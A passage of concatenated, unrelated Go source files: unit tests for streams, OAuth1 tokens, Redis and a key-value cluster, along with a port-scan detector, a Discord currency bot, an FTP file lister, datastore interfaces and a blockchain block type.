_, err := m.OpenStream()
Expect(err).ToNot(HaveOccurred())
// try to open a stream twice, but expect only one STREAM_ID_BLOCKED to be sent
_, err = m.OpenStream()
Expect(err).To(MatchError(qerr.TooManyOpenStreams))
_, err = m.OpenStream()
Expect(err).To(MatchError(qerr.TooManyOpenStreams))
})
})
})
|
package telemetry
import (
"testing"
"github.com/stretchr/testify/assert"
)
func Test_ServiceName(t *testing.T) {
t.Parallel()
tests := []struct {
name string
servicesOpt string
want string
}{
{"all", "all", "pomerium"},
{"proxy", "proxy", "pomerium-proxy"},
{"missing", "", "pomerium"},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
assert.Equal(t, tt.want, ServiceName(tt.servicesOpt))
})
}
}
|
package master
func InitMaster(filePath string) error {
return nil
}
|
package permission
type MenuRole struct {
Menu string `json:"menu"`
Roles []string `json:"roles"`
}
type UserMenu struct {
ProjectName string `json:"projectName"`
ProjectId string `json:"projectId"`
Menus []string `json:"menus"`
}
var MenuRoles = `
[
{
"menu": "PROJECT",
"roles": [
"PROJECT_MANAGER",
"CLUSTER_MANAGER"
]
},
{
"menu": "PROJECT-MEMBER",
"roles": [
"PROJECT_MANAGER"
]
},
{
"menu": "PROJECT-RESOURCE",
"roles": [
"PROJECT_MANAGER"
]
},
{
"menu": "CLUSTER",
"roles": [
"PROJECT_MANAGER",
"CLUSTER_MANAGER"
]
},
{
"menu": "CLUSTER-OVERVIEW",
"roles": [
"CLUSTER_MANAGER",
"PROJECT_MANAGER"
]
},
{
"menu": "CLUSTER-NODE",
"roles": [
"CLUSTER_MANAGER",
"PROJECT_MANAGER"
]
},
{
"menu": "CLUSTER-NAMESPACE",
"roles": [
"CLUSTER_MANAGER",
"PROJECT_MANAGER"
]
},
{
"menu": "CLUSTER-STORAGE",
"roles": [
"CLUSTER_MANAGER",
"PROJECT_MANAGER"
]
},
{
"menu": "CLUSTER-LOGGING",
"roles": [
"CLUSTER_MANAGER",
"PROJECT_MANAGER"
]
},
{
"menu": "CLUSTER-MONITOR",
"roles": [
"CLUSTER_MANAGER",
"PROJECT_MANAGER"
]
},
{
"menu": "CLUSTER-CATALOG",
"roles": [
"CLUSTER_MANAGER",
"PROJECT_MANAGER"
]
},
{
"menu": "CLUSTER-REPOSITORY",
"roles": [
"CLUSTER_MANAGER",
"PROJECT_MANAGER"
]
},
{
"menu": "CLUSTER-REPOSITORY-CHARTMUSEUM",
"roles": [
"CLUSTER_MANAGER",
"PROJECT_MANAGER"
]
},
{
"menu": "CLUSTER-REPOSITORY-REGISTRY",
"roles": [
"CLUSTER_MANAGER",
"PROJECT_MANAGER"
]
},
{
"menu": "CLUSTER-TOOL",
"roles": [
"CLUSTER_MANAGER",
"PROJECT_MANAGER"
]
},
{
"menu": "CLUSTER-DASHBOARD",
"roles": [
"CLUSTER_MANAGER",
"PROJECT_MANAGER"
]
},
{
"menu": "HOST",
"roles": [
]
},
{
"menu": "SETTING",
"roles": [
]
},
{
"menu": "SETTING-SYSTEM",
"roles": [
]
},
{
"menu": "SETTING-CREDENTIAL",
"roles": [
]
},
{
"menu": "DEPLOY",
"roles": [
]
},
{
"menu": "DEPLOY-REGION",
"roles": [
]
},
{
"menu": "DEPLOY-ZONE",
"roles": [
]
},
{
"menu": "DEPLOY-PLAN",
"roles": [
]
},
{
"menu": "USER",
"roles": [
]
}
]
`
|
package oauth1
import (
"net/url"
"strconv"
"testing"
)
// Test the ability to parse a URL query string and unmarshal to a RequestToken.
func TestParseRequestTokenStr(t *testing.T) {
oauth_token:="c0cf8793d39d46ab"
oauth_token_secret:="FMMj3w7plPEyhK8ZZ9lBsp"
oauth_callback_confirmed:=true
values := url.Values{}
values.Set("oauth_token", oauth_token)
values.Set("oauth_token_secret", oauth_token_secret)
values.Set("oauth_callback_confirmed", strconv.FormatBool(oauth_callback_confirmed))
token, err := ParseRequestTokenStr(values.Encode())
if err != nil {
t.Errorf("Expected Request Token parsed, got Error %s", err.Error())
}
if token.token != oauth_token {
t.Errorf("Expected Request Token %v, got %v", oauth_token, token.token)
}
if token.secret != oauth_token_secret {
t.Errorf("Expected Request Token Secret %v, got %v", oauth_token_secret, token.secret)
}
}
// Test the ability to Encode a RequestToken to a URL query string.
func TestEncodeRequestToken(t *testing.T) {
token := RequestToken {
token : "c0cf8793d39d46ab",
secret : "FMMj3w7plPEyhK8ZZ9lBsp",
callbackConfirmed : true,
}
tokenStr := token.Encode()
expectedStr := "oauth_token_secret=FMMj3w7plPEyhK8ZZ9lBsp&oauth_token=c0cf8793d39d46ab&oauth_callback_confirmed=true"
if tokenStr != expectedStr {
t.Errorf("Expected Request Token Encoded as %v, got %v", expectedStr, tokenStr)
}
}
// Test the ability to parse a URL query string and unmarshal to an AccessToken.
func TestEncodeAccessTokenStr(t *testing.T) {
oauth_token:="c0cf8793d39d46ab"
oauth_token_secret:="FMMj3w7plPEyhK8ZZ9lBsp"
oauth_callback_confirmed:=true
values := url.Values{}
values.Set("oauth_token", oauth_token)
values.Set("oauth_token_secret", oauth_token_secret)
values.Set("oauth_callback_confirmed", strconv.FormatBool(oauth_callback_confirmed))
token, err := ParseAccessTokenStr(values.Encode())
if err != nil {
t.Errorf("Expected Access Token parsed, got Error %s", err.Error())
}
if token.token != oauth_token {
t.Errorf("Expected Access Token %v, got %v", oauth_token, token.token)
}
if token.secret != oauth_token_secret {
t.Errorf("Expected Access Token Secret %v, got %v", oauth_token_secret, token.secret)
}
}
// Test the ability to Encode an AccessToken to a URL query string.
func TestEncodeAccessToken(t *testing.T) {
token := AccessToken {
token : "c0cf8793d39d46ab",
secret : "FMMj3w7plPEyhK8ZZ9lBsp",
params : map[string]string{ "user" : "dr_van_nostrand" },
}
tokenStr := token.Encode()
expectedStr := "user=dr_van_nostrand&oauth_token_secret=FMMj3w7plPEyhK8ZZ9lBsp&oauth_token=c0cf8793d39d46ab"
if tokenStr != expectedStr {
t.Errorf("Expected Access Token Encoded as %v, got %v", expectedStr, tokenStr)
}
}
|
package array
import (
"fmt"
"testing"
)
func TestRotate(t *testing.T) {
//source := [][]int { { 1,2,3 } , { 4,5,6 } , { 7,8,9 }}
source := [][]int{{5, 1, 9, 11}, {2, 4, 8, 10}, {13, 3, 6, 7}, {15, 14, 12, 16}}
Rotate(source)
fmt.Println(source)
}
// 我太难了
func Rotate(matrix [][]int) {
// mid := (len(matrix) - 1) / 2 + 1
ml := len(matrix)
for i := 0; i < ml-1; i++ {
for j := i; j < ml-1-i; j++ {
currPoint := []int{i, j}
nextPoint := []int{currPoint[1], ml - 1 - currPoint[0]}
temp := matrix[currPoint[0]][currPoint[1]]
temp, matrix[nextPoint[0]][nextPoint[1]] = matrix[nextPoint[0]][nextPoint[1]], temp
currPoint = nextPoint
nextPoint = []int{currPoint[1], ml - 1 - currPoint[0]}
temp, matrix[nextPoint[0]][nextPoint[1]] = matrix[nextPoint[0]][nextPoint[1]], temp
currPoint = nextPoint
nextPoint = []int{currPoint[1], ml - 1 - currPoint[0]}
temp, matrix[nextPoint[0]][nextPoint[1]] = matrix[nextPoint[0]][nextPoint[1]], temp
currPoint = nextPoint
nextPoint = []int{currPoint[1], ml - 1 - currPoint[0]}
temp, matrix[nextPoint[0]][nextPoint[1]] = matrix[nextPoint[0]][nextPoint[1]], temp
}
}
}
|
package test
import (
"fmt"
"git-get/pkg/run"
"io/ioutil"
"os"
"path/filepath"
"testing"
)
// TempDir creates a temporary directory inside the parent dir.
// If parent is empty, it will use a system default temp dir (usually /tmp).
func TempDir(t *testing.T, parent string) string {
dir, err := ioutil.TempDir(parent, "git-get-repo-")
checkFatal(t, err)
// Automatically remove temp dir when the test is over.
t.Cleanup(func() {
err := os.RemoveAll(dir)
if err != nil {
t.Errorf("failed removing test repo %s", dir)
}
})
return dir
}
func (r *Repo) init() {
err := run.Git("init", "--quiet", r.path).AndShutUp()
checkFatal(r.t, err)
}
// writeFile writes the content string into a file. If file doesn't exists, it will create it.
func (r *Repo) writeFile(filename string, content string) {
path := filepath.Join(r.path, filename)
file, err := os.OpenFile(path, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, 0644)
checkFatal(r.t, err)
_, err = file.Write([]byte(content))
checkFatal(r.t, err)
}
func (r *Repo) stageFile(path string) {
err := run.Git("add", path).OnRepo(r.path).AndShutUp()
checkFatal(r.t, err)
}
func (r *Repo) commit(msg string) {
err := run.Git("commit", "-m", fmt.Sprintf("%q", msg), "--author=\"user <user@example.com>\"").OnRepo(r.path).AndShutUp()
checkFatal(r.t, err)
}
func (r *Repo) branch(name string) {
err := run.Git("branch", name).OnRepo(r.path).AndShutUp()
checkFatal(r.t, err)
}
func (r *Repo) tag(name string) {
err := run.Git("tag", "-a", name, "-m", name).OnRepo(r.path).AndShutUp()
checkFatal(r.t, err)
}
func (r *Repo) checkout(name string) {
err := run.Git("checkout", name).OnRepo(r.path).AndShutUp()
checkFatal(r.t, err)
}
func (r *Repo) clone() *Repo {
dir := TempDir(r.t, "")
url := fmt.Sprintf("file://%s/.git", r.path)
err := run.Git("clone", url, dir).AndShutUp()
checkFatal(r.t, err)
clone := &Repo{
path: dir,
t: r.t,
}
return clone
}
func (r *Repo) fetch() {
err := run.Git("fetch", "--all").OnRepo(r.path).AndShutUp()
checkFatal(r.t, err)
}
func checkFatal(t *testing.T, err error) {
if err != nil {
t.Fatalf("failed making test repo: %+v", err)
}
}
|
package worder
type History struct {
UserID string
OrderID string
StatusID uint64
}
|
package ast
// Node is a generic representation of an element in the SQL AST.
type Node interface {
// BuildQuery creates a valid SQL query from the AST node.
BuildQuery() string
}
|
package connrt
import (
"fmt"
"sort"
"strconv"
"strings"
"time"
"github.com/gookit/event"
"github.com/kbence/conndetect/internal/connlib"
"github.com/kbence/conndetect/internal/utils"
)
type ExpiringConnection struct {
connlib.DirectionalConnection
ExpiresAt time.Time
}
type ExpiringConnectionList []ExpiringConnection
func UniqueConnectionKey(c connlib.DirectionalConnection) string {
return fmt.Sprintf("%s>%s", c.Source.IP.String(), c.Destination.IP.String())
}
type PortMap map[uint16]ExpiringConnection
func (m *PortMap) GetSortedPorts() []int {
ports := []int{}
for port := range *m {
ports = append(ports, int(port))
}
sort.Ints(ports)
return ports
}
type PortscanSettings struct {
MaxPorts int
Interval time.Duration
}
func NewPortscanSettings(maxPorts int, period time.Duration) *PortscanSettings {
return &PortscanSettings{
MaxPorts: maxPorts,
Interval: period,
}
}
type PortscanDetector struct {
Node
printer utils.Printer
time utils.Time
settings *PortscanSettings
connectionLog map[string]PortMap
scanReported map[string]interface{}
}
func NewPortscanDetector(eventManager event.ManagerFace, settings *PortscanSettings) *PortscanDetector {
detector := &PortscanDetector{
Node: Node{eventManager: eventManager},
printer: utils.NewPrinter(),
time: utils.NewTime(),
settings: settings,
connectionLog: map[string]PortMap{},
scanReported: map[string]interface{}{},
}
eventManager.On("newConnection", event.ListenerFunc(detector.Handle))
return detector
}
func (d *PortscanDetector) Handle(e event.Event) error {
var connection *connlib.DirectionalConnection = nil
if connObj := e.Get("connection"); connObj != nil {
switch conn := connObj.(type) {
case connlib.DirectionalConnection:
connection = &conn
}
}
// Do nothing
if connection == nil {
return nil
}
d.saveConnection(connection)
portMap := d.findPortMap(connection)
if len(*portMap) >= d.settings.MaxPorts {
d.reportScan(connection, portMap)
}
return nil
}
func (d *PortscanDetector) reportScan(connection *connlib.DirectionalConnection, portMap *PortMap) {
connectionKey := UniqueConnectionKey(*connection)
if _, found := d.scanReported[connectionKey]; found {
return
}
ports := []string{}
for _, port := range portMap.GetSortedPorts() {
ports = append(ports, strconv.Itoa(port))
}
d.printer.Printf(
"%s: Port scan detected: %s -> %s on ports %s\n",
d.time.Now().Format(TIME_FORMAT),
connection.Source.IP.String(),
connection.Destination.IP.String(),
strings.Join(ports, ","),
)
d.scanReported[connectionKey] = nil
}
func (d *PortscanDetector) findPortMap(connection *connlib.DirectionalConnection) *PortMap {
if portMap, found := d.connectionLog[UniqueConnectionKey(*connection)]; found {
return &portMap
}
return nil
}
func (d *PortscanDetector) saveConnection(connection *connlib.DirectionalConnection) {
expiringConn := ExpiringConnection{
DirectionalConnection: *connection,
ExpiresAt: d.time.Now().Add(d.settings.Interval),
}
connectionKey := UniqueConnectionKey(*connection)
if _, found := d.connectionLog[connectionKey]; !found {
d.connectionLog[connectionKey] = PortMap{}
}
// let's do some lazy cleanup
d.cleanUpConnection(connectionKey)
d.connectionLog[connectionKey][expiringConn.Destination.Port] = expiringConn
}
func (d *PortscanDetector) cleanUpConnection(connectionKey string) {
newPortMap := PortMap{}
for _, conn := range d.connectionLog[connectionKey] {
if d.time.Now().Before(conn.ExpiresAt) {
newPortMap[conn.Destination.Port] = conn
}
}
d.connectionLog[connectionKey] = newPortMap
}
|
package discord
import (
"fmt"
"strconv"
"strings"
"time"
"github.com/bwmarrin/discordgo"
)
const leftArrow = "⬅️"
const rightArrow = "➡️"
type reactionMsg struct {
Type reactionMsgType
Metadata map[string]interface{}
Handler func(*discordgo.MessageReactionAdd)
}
func (b *Bot) ldbPageSwitcher(r *discordgo.MessageReactionAdd) {
pg := b.pages[r.MessageID]
var page int
if r.Emoji.Name == leftArrow {
page = pg.Metadata["page"].(int) - 1
} else {
page = pg.Metadata["page"].(int) + 1
}
if ((page * 10) > pg.Metadata["count"].(int)) || (page < 0) {
b.dg.MessageReactionRemove(r.ChannelID, r.MessageID, r.Emoji.Name, r.UserID)
b.pages[r.MessageID] = pg
return
}
pg.Metadata["page"] = page
res, err := b.db.Query("SELECT user, wallet FROM currency WHERE guilds LIKE ? ORDER BY wallet DESC LIMIT 10 OFFSET ?", "%"+r.GuildID+"%", page*10)
if err != nil {
return
}
defer res.Close()
var ldb string
var user string
var wallet int
var usr *discordgo.User
i := 1 + (page * 10)
for res.Next() {
err = res.Scan(&user, &wallet)
if err != nil {
return
}
usr, err = b.dg.User(user)
if err != nil {
return
}
ldb += fmt.Sprintf("%d. %s#%s - %d\n", i, usr.Username, usr.Discriminator, wallet)
i++
}
gld, err := b.dg.Guild(r.GuildID)
if err != nil {
return
}
b.dg.ChannelMessageEditEmbed(r.ChannelID, r.MessageID, &discordgo.MessageEmbed{
Title: fmt.Sprintf("Richest users in %s", gld.Name),
Description: ldb,
})
b.dg.MessageReactionRemove(r.ChannelID, r.MessageID, r.Emoji.Name, r.UserID)
b.pages[r.MessageID] = pg
}
func (b *Bot) currencyBasics(s *discordgo.Session, m *discordgo.MessageCreate) {
if m.Author.ID == s.State.User.ID || m.Author.Bot {
return
}
if b.startsWith(m, "daily") {
b.checkuser(m)
user, success := b.getuser(m, m.Author.ID)
if !success {
return
}
_, exists := user.Metadata["lastdaily"]
if !exists {
user.Metadata["lastdaily"] = time.Now().Unix()
} else {
diff := time.Now().Unix() - int64(user.Metadata["lastdaily"].(float64))
if (diff) < 86400 { // less than a day
s.ChannelMessageSend(m.ChannelID, fmt.Sprintf("You still need to wait %0.2f hours.", 24-(float32(diff)/3600)))
return
}
}
user.Wallet += 2500
user.Metadata["lastdaily"] = time.Now().Unix()
success = b.updateuser(m, user)
if !success {
return
}
s.ChannelMessageSend(m.ChannelID, "Congrats on the 2,500 coins! Come back in 24 hours to get more!")
return
}
if b.startsWith(m, "bal") {
b.checkuser(m)
id := m.Author.ID
person := "You have"
describer := "your"
if len(m.Mentions) > 0 {
id = m.Mentions[0].ID
b.checkuserwithid(m, id)
person = "<@" + id + "> has"
describer = "their"
}
user, success := b.getuser(m, id)
if !success {
return
}
s.ChannelMessageSend(m.ChannelID, fmt.Sprintf("%s %d coins in %s wallet and %d coins in the bank. %s credit is %d.", person, user.Wallet, describer, user.Bank, strings.Title(describer), user.Credit))
return
}
if b.startsWith(m, "dep") {
b.checkuser(m)
user, success := b.getuser(m, m.Author.ID)
if !success {
return
}
var dep string
_, err := fmt.Sscanf(m.Content, "dep %s", &dep)
if b.handle(err, m) {
return
}
var num int
if dep == "all" {
num = user.Wallet
} else {
num, err = strconv.Atoi(dep)
if b.handle(err, m) {
return
}
num = b.abs(num)
}
if user.Wallet < num {
num = user.Wallet
}
user.Bank += num
user.Wallet -= num
success = b.updateuser(m, user)
if !success {
return
}
s.ChannelMessageSend(m.ChannelID, fmt.Sprintf("Deposited %d coins.", num))
return
}
if b.startsWith(m, "with") {
b.checkuser(m)
user, success := b.getuser(m, m.Author.ID)
if !success {
return
}
var with string
_, err := fmt.Sscanf(m.Content, "with %s", &with)
if b.handle(err, m) {
return
}
var num int
if with == "all" {
num = user.Bank
} else {
num, err = strconv.Atoi(with)
if b.handle(err, m) {
return
}
num = b.abs(num)
}
if user.Bank < num {
num = user.Bank
}
user.Bank -= num
user.Wallet += num
success = b.updateuser(m, user)
if !success {
return
}
s.ChannelMessageSend(m.ChannelID, fmt.Sprintf("Withdrew %d coins.", num))
return
}
if b.startsWith(m, "ldb") {
count := b.db.QueryRow("SELECT COUNT(1) FROM currency WHERE guilds LIKE ?", "%"+m.GuildID+"%")
var num int
err := count.Scan(&num)
if b.handle(err, m) {
return
}
res, err := b.db.Query("SELECT user, wallet FROM currency WHERE guilds LIKE ? ORDER BY wallet DESC LIMIT 10", "%"+m.GuildID+"%")
if b.handle(err, m) {
return
}
defer res.Close()
var ldb string
var user string
var wallet int
var usr *discordgo.User
i := 1
for res.Next() {
err = res.Scan(&user, &wallet)
if b.handle(err, m) {
return
}
usr, err = s.User(user)
if b.handle(err, m) {
return
}
ldb += fmt.Sprintf("%d. %s#%s - %d\n", i, usr.Username, usr.Discriminator, wallet)
i++
}
gld, err := s.Guild(m.GuildID)
if b.handle(err, m) {
return
}
msg, _ := s.ChannelMessageSendEmbed(m.ChannelID, &discordgo.MessageEmbed{
Title: fmt.Sprintf("Richest users in %s", gld.Name),
Description: ldb,
})
s.MessageReactionAdd(m.ChannelID, msg.ID, leftArrow)
s.MessageReactionAdd(m.ChannelID, msg.ID, rightArrow)
b.pages[msg.ID] = reactionMsg{
Type: ldbPageSwitcher,
Metadata: map[string]interface{}{
"page": 0,
"count": num,
},
Handler: b.ldbPageSwitcher,
}
return
}
if b.startsWith(m, "credup") {
user, suc := b.getuser(m, m.Author.ID)
if !suc {
return
}
var numVal string
_, err := fmt.Sscanf(m.Content, "credup %s", &numVal)
if b.handle(err, m) {
return
}
var num int
if numVal == "max" {
price := 0
for price < user.Wallet {
numoff := num + user.Credit
price = (numoff * numoff) - (user.Credit * user.Credit)
num++
}
if num > 0 {
num--
}
} else {
num, err = strconv.Atoi(numVal)
if b.handle(err, m) {
return
}
num = b.abs(num)
}
numoff := num + user.Credit
price := (numoff * numoff) - (user.Credit * user.Credit)
if user.Wallet < price {
s.ChannelMessageSend(m.ChannelID, fmt.Sprintf("You need %d more coins to upgrade your credit %d levels.", price-user.Wallet, num))
return
}
user.Wallet -= price
user.Credit += num
suc = b.updateuser(m, user)
if !suc {
return
}
s.ChannelMessageSend(m.ChannelID, fmt.Sprintf("You upgraded your credit by %d levels!", num))
return
}
if b.startsWith(m, "donate") {
b.checkuser(m)
if !(len(m.Mentions) > 0) {
s.ChannelMessageSend(m.ChannelID, "You need to mention the person you are going to donate to!")
return
}
if m.Mentions[0].ID == m.Author.ID {
s.ChannelMessageSend(m.ChannelID, "You can't donate to yourself!")
return
}
b.checkuserwithid(m, m.Mentions[0].ID)
user1, suc := b.getuser(m, m.Author.ID)
if !suc {
return
}
var num int
_, err := fmt.Sscanf(m.Content, "donate %d", &num)
if b.handle(err, m) {
return
}
num = b.abs(num)
if user1.Wallet < num {
s.ChannelMessageSend(m.ChannelID, "You don't have that much money to give!")
return
}
user2, suc := b.getuser(m, m.Mentions[0].ID)
if !suc {
return
}
user1.Wallet -= num
user2.Wallet += num
b.updateuser(m, user1)
b.updateuser(m, user2)
s.ChannelMessageSend(m.ChannelID, fmt.Sprintf("Successfully donated %d coins to <@%s>!", num, m.Mentions[0].ID))
}
}
|
package kvs_test
import (
"errors"
"fmt"
"time"
. "github.com/bryanl/dolb/kvs"
. "github.com/onsi/ginkgo"
. "github.com/onsi/gomega"
)
var _ = Describe("Cluster", func() {
var (
err error
kvs *MockKVS
checkTTL = time.Millisecond * 10
cluster *Cluster
failErr = errors.New("fail")
)
BeforeEach(func() {
kvs = &MockKVS{}
cluster = NewCluster(kvs, checkTTL)
})
Describe("RegisterAgent", func() {
var (
index uint64
)
JustBeforeEach(func() {
index, err = cluster.RegisterAgent("agent1")
})
Context("with success", func() {
BeforeEach(func() {
opts := &SetOptions{TTL: checkTTL}
node := &Node{ModifiedIndex: 1}
kvs.On("Set", "/agent/leader/agent1", "agent1", opts).Return(node, nil)
})
It("doesn't return an error", func() {
Ω(err).ToNot(HaveOccurred())
})
It("returns the last modified index", func() {
Ω(index).ToNot(Equal(1))
})
})
Context("with kv error", func() {
BeforeEach(func() {
opts := &SetOptions{TTL: checkTTL}
kvs.On("Set", "/agent/leader/agent1", "agent1", opts).Return(nil, failErr)
})
It("returns an error", func() {
Ω(err).To(HaveOccurred())
})
})
})
Describe("Leader", func() {
var (
leader *Leader
)
JustBeforeEach(func() {
leader, err = cluster.Leader()
})
Context("with nodes", func() {
BeforeEach(func() {
opts := &GetOptions{Recursive: true}
rootNode := &Node{Nodes: Nodes{}}
for i := uint64(1); i <= 3; i++ {
rootNode.Nodes = append(rootNode.Nodes, &Node{CreatedIndex: i + 1, Value: fmt.Sprintf("node%d", i)})
}
kvs.On("Get", cluster.LeaderKey, opts).Return(rootNode, nil)
})
It("returns the leader", func() {
Ω(leader).To(Equal(&Leader{Name: "node1", NodeCount: 3}))
})
It("doesn't return an error", func() {
Ω(err).ToNot(HaveOccurred())
})
})
Context("with no nodes", func() {
BeforeEach(func() {
opts := &GetOptions{Recursive: true}
rootNode := &Node{Nodes: Nodes{}}
kvs.On("Get", cluster.LeaderKey, opts).Return(rootNode, nil)
})
It("returns an error", func() {
Ω(err).To(HaveOccurred())
})
})
Context("with leader retrieval error", func() {
BeforeEach(func() {
opts := &GetOptions{Recursive: true}
kvs.On("Get", cluster.LeaderKey, opts).Return(nil, failErr)
})
It("returns an error", func() {
Ω(err).To(HaveOccurred())
})
})
})
Describe("Refresh", func() {
var (
index uint64
)
JustBeforeEach(func() {
index, err = cluster.Refresh("agent1", 5)
})
Context("with no error", func() {
BeforeEach(func() {
opts := &SetOptions{
TTL: checkTTL,
PrevIndex: 5,
}
node := &Node{ModifiedIndex: 6}
kvs.On("Set", cluster.LeaderKey+"/agent1", "agent1", opts).Return(node, nil)
})
It("doesn't return an error", func() {
Ω(err).ToNot(HaveOccurred())
})
It("returns the new index", func() {
Ω(index).To(Equal(uint64(6)))
})
})
Context("with an error", func() {
BeforeEach(func() {
opts := &SetOptions{
TTL: checkTTL,
PrevIndex: 5,
}
kvs.On("Set", cluster.LeaderKey+"/agent1", "agent1", opts).Return(nil, failErr)
})
It("returns an error", func() {
Ω(err).To(HaveOccurred())
})
})
})
})
|
package redis_test
import (
"os"
"testing"
"time"
"github.com/caarlos0/env"
"github.com/go-redis/redis"
. "web-layout/utils/redis"
)
func TestConnect(t *testing.T) {
os.Setenv("REDIS_ADDRS", "127.0.0.1:6379")
os.Setenv("REDIS_PWD", "")
os.Setenv("REDIS_POOL_SIZE", "100")
os.Setenv("REDIS_DB", "1")
c := Config{}
if err := env.Parse(&c); err != nil {
t.Error(err)
return
}
redisPool, err := c.Connect()
if err != nil {
t.Error(err)
return
}
res, err := redisPool.Set("test_key1", "test_value", time.Minute*10).Result()
if err != nil {
t.Error(err)
return
}
t.Log(res)
}
func TestRedis_Hash(t *testing.T) {
os.Setenv("REDIS_ADDRS", "127.0.0.1:6379")
os.Setenv("REDIS_PWD", "")
os.Setenv("REDIS_POOL_SIZE", "100")
os.Setenv("REDIS_DB", "1")
c := Config{}
if err := env.Parse(&c); err != nil {
t.Error(err)
return
}
redisPool, err := c.Connect()
if err != nil {
t.Error(err)
return
}
hashKey := "HashKey"
data := map[string]interface{}{
"field1": "value1",
"field2": 2,
"field3": true,
}
for k, v := range data {
_, err := redisPool.HSet(hashKey, k, v).Result()
if err != nil {
t.Error(err)
return
}
}
// get all
results, err := redisPool.HGetAll(hashKey).Result()
if err != nil {
t.Error(err)
return
}
t.Log("HGetAll Results : ", results)
// get certain field
value, err := redisPool.HGet(hashKey, "field1").Result()
if err != nil {
t.Error(err)
return
}
t.Log("HGet field1 : ", value)
}
func TestRedis_Sorted_Sets(t *testing.T) {
os.Setenv("REDIS_ADDRS", "127.0.0.1:6379")
os.Setenv("REDIS_PWD", "")
os.Setenv("REDIS_POOL_SIZE", "100")
os.Setenv("REDIS_DB", "1")
c := Config{}
if err := env.Parse(&c); err != nil {
t.Error(err)
return
}
redisPool, err := c.Connect()
if err != nil {
t.Error(err)
return
}
sortedSetKey := "SortedSets"
data := map[interface{}]float64{
"player1": 12,
"player2": 2,
"player3": 3,
}
// 设置两遍
for i := 0; i < 2; i++ {
for k, v := range data {
_, err := redisPool.ZIncr(sortedSetKey, redis.Z{
Member: k,
Score: v,
}).Result()
if err != nil {
t.Error(err)
return
}
}
}
// 根据排名获取数据
// 有多种获取数据的方法
results, err := redisPool.ZRevRangeWithScores(sortedSetKey, 0, 10).Result()
if err != nil {
t.Error(err)
return
}
for _, v := range results {
t.Log(v)
}
}
func TestRedis_Lists(t *testing.T) {
os.Setenv("REDIS_ADDRS", "127.0.0.1:6379")
os.Setenv("REDIS_PWD", "")
os.Setenv("REDIS_POOL_SIZE", "100")
os.Setenv("REDIS_DB", "1")
c := Config{}
if err := env.Parse(&c); err != nil {
t.Error(err)
return
}
redisPool, err := c.Connect()
if err != nil {
t.Error(err)
return
}
// 向list中插入数据
listKey := "List"
data := []interface{}{
true,
12,
"test",
22,
"player3",
3.9,
}
_, err = redisPool.LPush(listKey, data...).Result()
if err != nil {
t.Error(err)
return
}
// 获取长度
len, err := redisPool.LLen(listKey).Result()
if err != nil {
t.Error(err)
return
}
t.Log("LLen = ", len)
// pop
popData, err := redisPool.LPop(listKey).Result()
if err != nil {
t.Error(err)
return
}
t.Log("LPop = ", popData)
}
|
package main
import (
"os"
"fmt"
"github.com/secsy/goftp"
"bytes"
"log"
"io/ioutil"
"time"
// "path"
)
func getEnv(key, fallback string) string {
var value string
value, exists := os.LookupEnv(key)
if !exists {
value = fallback
}
return value
}
func main() {
config := goftp.Config {
User: "anonymous",
Password: "root@local.me",
ConnectionsPerHost: 21,
Timeout: 30 * time.Second,
Logger: os.Stderr,
}
ftpServer := getEnv("FTP_SERVER", "localhost" )
client, dailErr := goftp.DialConfig(config, ftpServer)
if dailErr != nil {
log.Fatal(dailErr)
panic(dailErr)
}
dir := getEnv("FTP_DIRECTORY", "/" )
download := getEnv("DOWNLOAD_FILES", "no" )
// files , err := client.ReadDir(dir)
files , err := client.ReadDir(dir)
if err != nil {
panic(err)
}
for _ , file := range files {
// if file.IsDir() {
// path.Join(dir, file.Name())
// } else {
if download == "yes" {
ret_file := file.Name()
fmt.Println("Retrieving file: ", ret_file)
buf := new(bytes.Buffer)
fullPathFile := dir + ret_file
rferr := client.Retrieve(fullPathFile, buf)
if rferr != nil {
panic(rferr)
}
fmt.Println("writing data to file", ret_file)
fmt.Println("Opening file", ret_file,"for writing")
w , _ := ioutil.ReadAll(buf)
ferr := ioutil.WriteFile(ret_file, w , 0644)
if ferr != nil {
log.Fatal(ferr)
panic(ferr)
} else {
fmt.Println("Writing", ret_file ," completed")
}
} else {
fmt.Println("the file is:", file.Name())
}
// }
}
} |
package datastore
import (
"github.com/jakewitcher/pos-server/graph/model"
)
var (
Customers CustomerProvider
Stores StoreProvider
Employees EmployeeProvider
Users UserProvider
)
type CustomerProvider interface {
CreateCustomer(newCustomer model.NewCustomerInput) (*model.Customer, error)
UpdateCustomer(updatedCustomer model.CustomerInput) (*model.Customer, error)
DeleteCustomer(customerId string) (*model.Customer, error)
FindCustomerById(customerId string) (*model.Customer, error)
FindCustomers(filter *model.CustomerFilter) ([]*model.Customer, error)
}
type StoreProvider interface {
CreateStore(newStore model.NewStoreInput) (*model.Store, error)
UpdateStore(updatedStore model.StoreInput) (*model.Store, error)
DeleteStore(storeId string) (*model.Store, error)
FindStoreById(storeId string) (*model.Store, error)
FindStores(filter *model.StoreFilter) ([]*model.Store, error)
}
type EmployeeProvider interface {
CreateEmployee(newEmployee model.NewEmployeeInput) (*model.Employee, error)
UpdateEmployee(updatedEmployee model.EmployeeInput) (*model.Employee, error)
DeleteEmployee(employeeId string) (*model.Employee, error)
FindEmployeeById(employeeId string) (*model.Employee, error)
FindEmployees() ([]*model.Employee, error)
}
type UserProvider interface {
CreateUser(newUser model.NewUserInput) (*model.User, error)
}
|
package main
import (
"crypto/sha256"
"encoding/hex"
"fmt"
"strconv"
"strings"
"time"
)
// Block struct
type Block struct {
Index int
Timestamp string
Transactions []Taction
Hash string
PrevHash string
Difficulty int
//in real bitcoin, nonce is 4 bytes
//string in golang is pointer (of size 8 bytes)
Nonce string
}
// validates the block. Usage is block.validate()
func (b *Block) validate(previous *Block) bool {
if previous.Index+1 != b.Index {
return false
}
if previous.Hash != b.PrevHash {
return false
}
if b.calculateHash() != b.Hash {
return false
}
return true
}
//calculates the hash for the block. Usage is block.calculateHash()
func (b *Block) calculateHash() string {
hashString := strconv.Itoa(b.Index) + b.Timestamp
for _, tact := range b.Transactions {
hashString += tact.ID
}
hashString += b.PrevHash + b.Nonce
// I looked it up, this is one of two built-in hash functions in the go standard crypto lib.
// This one seems good.
hasher := sha256.New()
hasher.Write([]byte(hashString))
hashed := hasher.Sum(nil)
return hex.EncodeToString(hashed)
}
func (b *Block) hasTransaction(t Taction) bool {
for _, bTaction := range b.Transactions {
if bTaction.equals(t) {
return true
}
}
return false
}
func (b *Block) equals(otherBlock Block) bool {
if b.Index != otherBlock.Index {
return false
}
